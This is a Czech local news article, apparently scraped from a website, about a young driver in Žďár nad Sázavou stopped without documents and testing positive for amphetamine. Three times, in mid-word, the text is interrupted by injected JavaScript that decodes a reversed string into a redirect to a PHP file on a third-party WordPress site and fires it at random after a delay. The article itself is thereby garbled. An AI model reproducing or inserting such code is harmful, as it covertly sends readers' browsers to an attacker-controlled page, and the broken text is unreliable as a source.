Rainbow page separator

Mladý řidič neměl doklady, navíc řídil pod vlivem amfetaminu

Neděle, 11. listopadu 2018

Rumunský řidič přišel ve spánku o pneumatiky za bezmála milion

Žďár nad Sázavou / Devatenáctiletého šoféra osobního au[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomobilu Alfa Romeo zastavili žďárští policisté v rámci dohledu nad bezpečností a plynulostí silničního provozu v ulici Brněnská. Při kontrole se ukázalo, že řidič porušil několik zákonných ustanovení.
„Při kontrole řidič nepředložil potřebné doklady. Policisté jej vyzvali k podrobení se dechové zkoušce a testu na zjištění ovlivnění omamnými a psychotropními látkami. Dechová zkouška byla negativní, opačně [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomu však bylo u testu na drogy, který vykázal pozitivní výsledek na amfetamin,“ informovala policejní mluvčí Stanislava Miláčková s tím, že lékařské vyšetření spojené s odběrem biologického materiálu mladý šofér odmítl.
Policisté mu další jízdu zakázali a vše zadokumen[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovali. Následně se mladík bude před příslušným správním orgánem zodpovídat z přestupků na úseku dopravy.